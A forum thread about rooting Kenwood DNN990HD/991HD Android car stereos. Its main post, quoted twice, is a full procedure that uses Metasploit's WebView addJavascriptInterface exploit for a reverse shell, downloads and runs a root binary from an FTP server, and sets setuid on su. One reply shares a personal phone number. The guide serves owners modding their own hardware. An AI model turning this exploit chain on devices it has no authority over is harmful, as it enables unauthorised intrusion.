Kenwood DNN990HD - Android 4.0.4 car stereo - How to get started with rooting?

Search This thread
Apr 2, 2019
1
0
A little late to the party

Hey everyone, I just got a truck with a DNN991hd. I’ve been trying to see if anyone made a better interface for it and although I read almost 2 dozen pages of this thread and several others I haven’t found anything yet. Maybe it’s out there and you know where I can look thanks a ton
 

Jaremyhawk

Member
Jun 21, 2017
8
0
sorry for bringing up a very old thread..

hey chris i i seem to be having troubles with the exploit when using exploit it shows this

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
will be trying this exploit on a kenwood DNN 991HD since the 990 and 991hd use the same chip

First, I want to sincerely thank everyone who pledged money and donated!! Donations have been a big help in recouping my losses in purchasing new units after bricking them as well as motivation for finding exploit methods.

I initially looked at Metasploit and abandoned it after loosing shell sessions after exploiting to a root shell. Another method has now made this possible.
The great news about Metasploit is that it doesn't require any of my proprietary software to execute and the fruits of my labor from that exploit have all been rolled over to this method.
Thank you Metasploit developers!!

Lastly, just to clear up some confusion from the previous posts - I never intentionally left the forums. I have been working behind the scenes with our awesome mods to work out some problems and all is well.

This actual root process and implementation has been tested by a few users here already, just the implementation of the exploit is different. This shouldn't matter and I expect the same positive results. However, I want to give the usual disclaimer that this might brick your unit. If it does, I cannot be held responsible. Do it at your own risk!




Here is how to obtain root on the DNN990HD using Metasploit reverse TCP Webview exploit.
NOTE: It would be nice if someone could provide a dedicated FTP server with a dedicated IP to host the exploit

This assumes that you have installed Metasploit for Windows or Linux and have the Metasploit Console open.
Enter the following after getting a sessions with Metasploit.

##Anything with a "#" Is just a notation. Anything without it needs to be entered into the console.

#First load up the Metasploit Exploit
use exploit/android/browser/webview_addjavascriptinterface

#Set website path name
set URIPATH kroot

#Start the Exploit!
exploit

#On your deck visit the website in this format <IP Address> : <port number> / <URIPATH>.
#Below is only an EXAMPLE
192.168.1.10:8080/kroot

# Wait for the Metasploit console to return a session number.
# This might take a few tries, so if it seems like your browser just hangs, turn off your deck and visit the website again.

#Once session is spawned do the command session -i <session number> #
sessions -i 1

#setup environment variable for Android/linux
export PATH=/system/bin:/system/xbin:/ramdisk:$PATH

#change dir to /sdcard
cd /sdcard

#############################################################################
# From this point forward you will see several commands separated by the pipe symbol: |
# This make life easy. It also helps keep the time window down before Kenwood system lock kicks in
#Feel free to copy those chunks and paste them into Metasploit.
###############################################################################

#get exploit to the deck
#Note, the FTP or HTTP MUST be an ip address and not a host name.
#Alternatively you can download the files directly to the unit and copy them over to sdcard manually.
#Sample command for the browser download method would be as follows:
#busybox cp /sdcard/download/kroot.tar /sdcard/kroot.tar
busybox wget ftp://<ftp_IP_Address>/kroot_temp.tar | busybox wget ftp://<IP Address>/cds_kroot.tar

#Extract Root
busybox tar -x -f kroot_temp.tar -C /ramdisk

#chmod the root for exec
chmod 775 /ramdisk/device.db | chmod 775 /ramdisk/kroot

#Change dir to ramdisk
cd /ramdisk

#Execute out exploit in ramdisk
kroot

#Check to see if we are root
busybox whoami

#####################################################
## The result should return 0 - root. If not, something went wrong
#####################################################

#change dir back to sdcard
cd /sdcard

#mount root fs and /system
mount -o rw,remount /system | mount -o rw,remount /

# extract our perm root to where it needs to go
busybox tar -x -f cds_kwroot.tar -C /

#chmod /system/app and /data/app
chmod 644 /system/app/eu.chainfire.supersu-1.apk | chmod 644 /data/app/com.speedsoftware.sqleditor-1.apk


#chmod binaries
chmod 6755 /system/xbin/su | chmod 6755 /system/xbin/sqlite3 | chmod 6755 /system/xbin/setpropex | chmod 6755 /system.bin/cds_kroot
chmod 6755 /system/bin/setpropex


#Enable non market apps for the DNN
sqlite3 /data/data/com.android.providers.settings/databases/settings.db "UPDATE secure SET value=1 WHERE name='install_non_market_apps';"

#clear dalvik cache, and remove our source files. /Ramdisk will be taken care of by recovery.
rm /data/dalvik-cache/* | rm /sdcard/cds_kroot.tar | rm /sdcard/kroot_temp.tar

#reboot the unit
#unit will hard reboot five times then launch into recovery and rebuild dalvik.
reboot

############################################################
## THE UNIT WILL DISPLAY AN ERROR during the five reboots.
## Do **NOT** do anything and just let it reboot five times. (six if you count the first reboot)
## Once the last reboot is done, "System Rebuilding" will kick in.
#############################################################


#You now have root and non market apps


Please provide feedback and let me know how this works.

I will release these custom apps I developed very soon:
KWAudio.apk - This switches the Kenwood amp input to "Android" mode so that custom installed apps will route the audio correctly. (Instead of having to launch USB mode or other work around)
CDS_Kroot.apk - Will re-enable non market apps again after the Kenwood lock reverts it back. This app also has other misc things like forcing system rebuild, clearing dalvik cache and launching "Developer" hidden Android menu.

I will also soon release my Play Store process. And no, it's not as simple as installing the PlayStore APK.




If this works for you, consider donating to ChainFire for his awesome SuperSU app and or myself for researching and coming up with the implementation.

Edited 6/19/2014 11:04 PM to fix typos and make it easier to read.
 

Jaremyhawk

Member
Jun 21, 2017
8
0
after further screwing around with the meraexploit you frogot to add the commands set Lhost (your pc ip)

set Lhost 4444
now the exploit runs
for some reason the prevous owner of this deck updated it to 1.8....... has anyone cracked this fw update? or is there a way to downgrade this unit back to 1.5 or 1.3
 

Leandro Mantecón

New member
Feb 13, 2020
1
0
Can anybody help me. I have a dnn9710bt. And during a repair on my vehicle, the mechanic did not turn off the panel when removing the battery from the car. After that, the control panel went into a loop when restarting, an ERROR message STARTING KW LAUCHER appears ... Even pressing the factory initialization (red button) ... Here in Brazil I did not find the solution. Thank you so much for your help!
My personal email [email protected]
whatsapp 55 34 99971 5038
 

juanchi1981

New member
Feb 27, 2020
1
0
Hi, I just have to create those files ???

These are the steps Kenwood sent me for wiping my dnn992
Only extract the (2) folders labeled ".Delete_Data.zip" and ".Longface_15DNN.zip". When you extract each of these folders, files named ".DELETE_DATA" and ".LONGFACE_15DNN" will be available. Be sure to format the USB to FAT32 prior to placing the files onto it. Keep in mind that a format will delete all information currently on the USB.



Copy the 2 files (.DELETE_DATA" and ".LONGFACE_15DNN) into a USB flash drive along with the zip folder labeled "update.zip".



Do not extract the "update.zip" folder. The USB flash drive should now contain 2 files (.DELETE_DATA" and ".LONGFACE_14DNN) and one zipped folder (update.zip) only.



Connect the USB flash drive to the unit and it should start automatically.

The update should take a few minutes. Be sure to connect the USB flash drive to the USB port, not the iPod or WiFi port.

hello, would you help me by sending the files to my mail [email protected], thanks
 
Last edited:

Birra75

New member
Apr 5, 2020
1
0
I have DNN990HD which have corrupted ROM. Does anyone have guidelines how to flash fwdn and where to get unmodified ROM for it? Thanks.
 

reggieguy1

New member
Jun 22, 2020
1
0
please i have the same problem with my unit and i spent a whole lot is buying it, please i really need your help i cant just afford to loose it just like that , mine is the DNN990HD, please do get back to me ASAP my email is [email protected]
 

denzfarid

Member
Aug 31, 2011
25
4
jakarta
hai folks long time no see this thread,
Question:
How to update su binary?
problem si supuer user su binary has been outdated and always failed of im update, only in apps superuser but working with terminal
thank you
 

golgothagecko

Senior Member
Apr 5, 2011
103
48
I could use some help. I had to do a factory reset on my DNN990HD, That seems to have gone OK. However, I am unable to sign into the Account Owner process. My username and password checks out, and it works if I use a PC. However, I noticed that the browser on the head unit will not open this URL: https://www.kenwood.com/car/app/kenwood_route_collector/eng/ and trying to sign into my Account Owner returns an authorization error. I don't think it's a network problem as I tried from 2 different networks (mobile tether and home wifi). Any ideas?
 

Radius118

Member
Dec 21, 2011
20
1
For anyone still screwing around with these radios that needs help with corrupted firmware, boot-looping, lost passwords, etc I have a resource to fix all of these issues to point you to.

You will need to either be really good at soldering or have the JST connector to connect to the USB header on the daughter board.
 

golgothagecko

Senior Member
Apr 5, 2011
103
48
For anyone still screwing around with these radios that needs help with corrupted firmware, boot-looping, lost passwords, etc I have a resource to fix all of these issues to point you to.

You will need to either be really good at soldering or have the JST connector to connect to the USB header on the daughter board.
I'm capable of soldering. Where is the resource?
 

Radius118

Member
Dec 21, 2011
20
1
I'm capable of soldering. Where is the resource?

Do you need password recovery or complete firmware re-write?

I can help you with the procedure for lost passwords and that does not require any soldering or connection to the OTG USB port.

Firmware erase and rewrite requires help from a 3rd party. He charges for his services since he is a Kenwood factory authorized repair facility.

Let me know if you just need password recovery or if you need firmware erase and rewrite.
 

golgothagecko

Senior Member
Apr 5, 2011
103
48
Do you need password recovery or complete firmware re-write?

I can help you with the procedure for lost passwords and that does not require any soldering or connection to the OTG USB port.

Firmware erase and rewrite requires help from a 3rd party. He charges for his services since he is a Kenwood factory authorized repair facility.

Let me know if you just need password recovery or if you need firmware erase and rewrite.
I was able to reimage my unit, but it will not register an admin account anymore. It appears that TLS1.0 client on the 990 won't connect to their route collector site anymore. They've upgraded their server but didn't upgrade the clients :(

I was hoping for a way to create an admin account so I'm not prompted to push "Guest" each time I start my car.
 

Radius118

Member
Dec 21, 2011
20
1
I was able to reimage my unit, but it will not register an admin account anymore. It appears that TLS1.0 client on the 990 won't connect to their route collector site anymore. They've upgraded their server but didn't upgrade the clients :(

I was hoping for a way to create an admin account so I'm not prompted to push "Guest" each time I start my car.

Unless these radios are registered with the route collector site you have to either push the "guest" or "administrator" buttons every time. It's super annoying. If it is registered and you know the password then you can use the "auto login" feature to bypass that.

However, if you DO have passwords set up on your unit, I strongly recommend removing them. KW is shutting down the route collector site and as of today all services at that site are discontinued. The site will be completely gone by 2025.

If your radio has a forgotten administrator password there is a procedure to reset that I can share. If it does have a password, and you know what it is then I recommend trying to remove it. If it has no password at all then you want to keep it that way due to the issues you've noted with the route collector site, plus the site shutting down.
 

golgothagecko

Senior Member
Apr 5, 2011
103
48
KW really needs to push a final firmware to these units so the experience isn't complete crap. You can't even purchase a new stereo from them right now if you wanted to! (I've looked for a year+ now)
 

Marlonmo

New member
May 5, 2022
1
0
Hello guys, I live in Brazil, and I can't find a place to repair my DNN9710BT that is similar to the DNN991HD.

Same Service Manual that I don't have!

I't don't start. Only show the red light, turn on a black screen, fan always on and anything I've tryed is working.

I't don't power the USB light of my USB Flash Drive , them, I think that it's impossible to reinstal the firmware.

Sorry to ask you, but I really need Help.

I've just have finished to pay for it.
 

XKenwood

Member
May 17, 2022
5
0
Do you need password recovery or complete firmware re-write?

I can help you with the procedure for lost passwords and that does not require any soldering or connection to the OTG USB port.

Firmware erase and rewrite requires help from a 3rd party. He charges for his services since he is a Kenwood factory authorized repair facility.

Let me know if you just need password recovery or if you need firmware erase and rewrite.
Sorry to revive an old thread, but.................

Another DNN that bit the dust with the lost password issue.

Radius, can you...kindly... help a fellow DNN991 owner bring his radio back to life?

I'm shocked at the wealth of info provided in this old thread. This forum has the best info I've seen on the Kenwood DNN series.

The Kenwood service center guy referenced is from Africa and has gotten quite a few radios back from the dead by erasing and rewriting firmware using internet connectivity.
 

Radius118

Member
Dec 21, 2011
20
1
Sorry to revive an old thread, but.................

Another DNN that bit the dust with the lost password issue.

Radius, can you...kindly... help a fellow DNN991 owner bring his radio back to life?

I'm shocked at the wealth of info provided in this old thread. This forum has the best info I've seen on the Kenwood DNN series.

The Kenwood service center guy referenced is from Africa and has gotten quite a few radios back from the dead by erasing and rewriting firmware using internet connectivity.

I have never tried my technique on a 991 but in theory it should work.

See the attached files and the instruction sheet I wrote. Hopefully this works for you.
 

Attachments

  • DNN990 Pass delete.zip
    259 bytes · Views: 9
  • Procedure.txt
    2.8 KB · Views: 12
  • Like
Reactions: XKenwood

XKenwood

Member
May 17, 2022
5
0
I have never tried my technique on a 991 but in theory it should work.

See the attached files and the instruction sheet I wrote. Hopefully this works for you.
Thank you so much for getting back to me on this! I will test this out today and post results good or bad so you can keep building on the knowledge and also help others in the loop what works and what not. Some day this and all other qwerks these DNN units have will be an issue of the past.
 

Radius118

Member
Dec 21, 2011
20
1
Thank you so much for getting back to me on this! I will test this out today and post results good or bad so you can keep building on the knowledge and also help others in the loop what works and what not. Some day this and all other qwerks these DNN units have will be an issue of the past.

No worries. Hope you have success.

The quirks of these units will be an issue of the past once they are all in the scrap bin! LOL
 

Top Liked Posts

  • There are no posts matching your filters.
  • 8
    First, I want to sincerely thank everyone who pledged money and donated!! Donations have been a big help in recouping my losses in purchasing new units after bricking them as well as motivation for finding exploit methods.

    I initially looked at Metasploit and abandoned it after loosing shell sessions after exploiting to a root shell. Another method has now made this possible.
    The great news about Metasploit is that it doesn't require any of my proprietary software to execute and the fruits of my labor from that exploit have all been rolled over to this method.
    Thank you Metasploit developers!!

    Lastly, just to clear up some confusion from the previous posts - I never intentionally left the forums. I have been working behind the scenes with our awesome mods to work out some problems and all is well.

    This actual root process and implementation has been tested by a few users here already, just the implementation of the exploit is different. This shouldn't matter and I expect the same positive results. However, I want to give the usual disclaimer that this might brick your unit. If it does, I cannot be held responsible. Do it at your own risk!




    Here is how to obtain root on the DNN990HD using Metasploit reverse TCP Webview exploit.
    NOTE: It would be nice if someone could provide a dedicated FTP server with a dedicated IP to host the exploit

    This assumes that you have installed Metasploit for Windows or Linux and have the Metasploit Console open.
    Enter the following after getting a sessions with Metasploit.

    ##Anything with a "#" Is just a notation. Anything without it needs to be entered into the console.

    #First load up the Metasploit Exploit
    use exploit/android/browser/webview_addjavascriptinterface

    #Set website path name
    set URIPATH kroot

    #Start the Exploit!
    exploit

    #On your deck visit the website in this format <IP Address> : <port number> / <URIPATH>.
    #Below is only an EXAMPLE
    192.168.1.10:8080/kroot

    # Wait for the Metasploit console to return a session number.
    # This might take a few tries, so if it seems like your browser just hangs, turn off your deck and visit the website again.

    #Once session is spawned do the command session -i <session number> #
    sessions -i 1

    #setup environment variable for Android/linux
    export PATH=/system/bin:/system/xbin:/ramdisk:$PATH

    #change dir to /sdcard
    cd /sdcard

    #############################################################################
    # From this point forward you will see several commands separated by the pipe symbol: |
    # This make life easy. It also helps keep the time window down before Kenwood system lock kicks in
    #Feel free to copy those chunks and paste them into Metasploit.
    ###############################################################################

    #get exploit to the deck
    #Note, the FTP or HTTP MUST be an ip address and not a host name.
    #Alternatively you can download the files directly to the unit and copy them over to sdcard manually.
    #Sample command for the browser download method would be as follows:
    #busybox cp /sdcard/download/kroot.tar /sdcard/kroot.tar
    busybox wget ftp://<ftp_IP_Address>/kroot_temp.tar | busybox wget ftp://<IP Address>/cds_kroot.tar

    #Extract Root
    busybox tar -x -f kroot_temp.tar -C /ramdisk

    #chmod the root for exec
    chmod 775 /ramdisk/device.db | chmod 775 /ramdisk/kroot

    #Change dir to ramdisk
    cd /ramdisk

    #Execute out exploit in ramdisk
    kroot

    #Check to see if we are root
    busybox whoami

    #####################################################
    ## The result should return 0 - root. If not, something went wrong
    #####################################################

    #change dir back to sdcard
    cd /sdcard

    #mount root fs and /system
    mount -o rw,remount /system | mount -o rw,remount /

    # extract our perm root to where it needs to go
    busybox tar -x -f cds_kwroot.tar -C /

    #chmod /system/app and /data/app
    chmod 644 /system/app/eu.chainfire.supersu-1.apk | chmod 644 /data/app/com.speedsoftware.sqleditor-1.apk


    #chmod binaries
    chmod 6755 /system/xbin/su | chmod 6755 /system/xbin/sqlite3 | chmod 6755 /system/xbin/setpropex | chmod 6755 /system.bin/cds_kroot
    chmod 6755 /system/bin/setpropex


    #Enable non market apps for the DNN
    sqlite3 /data/data/com.android.providers.settings/databases/settings.db "UPDATE secure SET value=1 WHERE name='install_non_market_apps';"

    #clear dalvik cache, and remove our source files. /Ramdisk will be taken care of by recovery.
    rm /data/dalvik-cache/* | rm /sdcard/cds_kroot.tar | rm /sdcard/kroot_temp.tar

    #reboot the unit
    #unit will hard reboot five times then launch into recovery and rebuild dalvik.
    reboot

    ############################################################
    ## THE UNIT WILL DISPLAY AN ERROR during the five reboots.
    ## Do **NOT** do anything and just let it reboot five times. (six if you count the first reboot)
    ## Once the last reboot is done, "System Rebuilding" will kick in.
    #############################################################


    #You now have root and non market apps


    Please provide feedback and let me know how this works.

    I will release these custom apps I developed very soon:
    KWAudio.apk - This switches the Kenwood amp input to "Android" mode so that custom installed apps will route the audio correctly. (Instead of having to launch USB mode or other work around)
    CDS_Kroot.apk - Will re-enable non market apps again after the Kenwood lock reverts it back. This app also has other misc things like forcing system rebuild, clearing dalvik cache and launching "Developer" hidden Android menu.

    I will also soon release my Play Store process. And no, it's not as simple as installing the PlayStore APK.




    If this works for you, consider donating to ChainFire for his awesome SuperSU app and or myself for researching and coming up with the implementation.

    Edited 6/19/2014 11:04 PM to fix typos and make it easier to read.
    2
    CWM Touch

    Anyone know if TWRP recovery is smaller / same size-ish as CWM?

    If so, this might be something to look at? Might also be more user friendly.

    Hello all!

    TWRP is much bigger in size.
    HID is already built in kernel, no need to add it.

    I have a very good news, we now have a CWM touch that is functional. I managed to find the keypads, but they don't work for the moment, so we have to use touch for the moment.
    There is just a small configuration for the partition file that I have to correct and we'll have a full functional custom recovery. :)

    I attach you the current image, please don't try to use it, you can install it just to check the touch and scroll through the menu.

    It would be great if any of you can give me the dmesg log as I previously asked.

    The last issue that needs to be solved is to find a way to boot in recovery mode, beside the adb command.

    Cheers!
    2
    Hi Chris!

    I confirm I now have a rooted unit, I used your files and everything went fine. To remind, my unit is EU version DNN9230DAB and my FW version was 1.4.0.

    I'll try to find a server with static IP to make this available on the internet.

    Cheers!!

    Great to hear!
    1
    If the DNN990HD is such a crappy unit then why are you on a thread about making it better? Obviously you think it has some potential. I'd like to get back on the topic of making the DNN990HD better.

    It is because I feel sorry for those of you whom wasted so much money on it. Besides, it also doesn't appear that anyone that has one posses the technical ability to get root access. Most likely because anyone with the technical abilities would avoid it. So, that's why I am helping. I give my assistance to owners of all Android Head Units included the Sensus Connected Touch which is a $1,700 head unit from Volvo.
    1
    Sorry to revive an old thread, but.................

    Another DNN that bit the dust with the lost password issue.

    Radius, can you...kindly... help a fellow DNN991 owner bring his radio back to life?

    I'm shocked at the wealth of info provided in this old thread. This forum has the best info I've seen on the Kenwood DNN series.

    The Kenwood service center guy referenced is from Africa and has gotten quite a few radios back from the dead by erasing and rewriting firmware using internet connectivity.

    I have never tried my technique on a 991 but in theory it should work.

    See the attached files and the instruction sheet I wrote. Hopefully this works for you.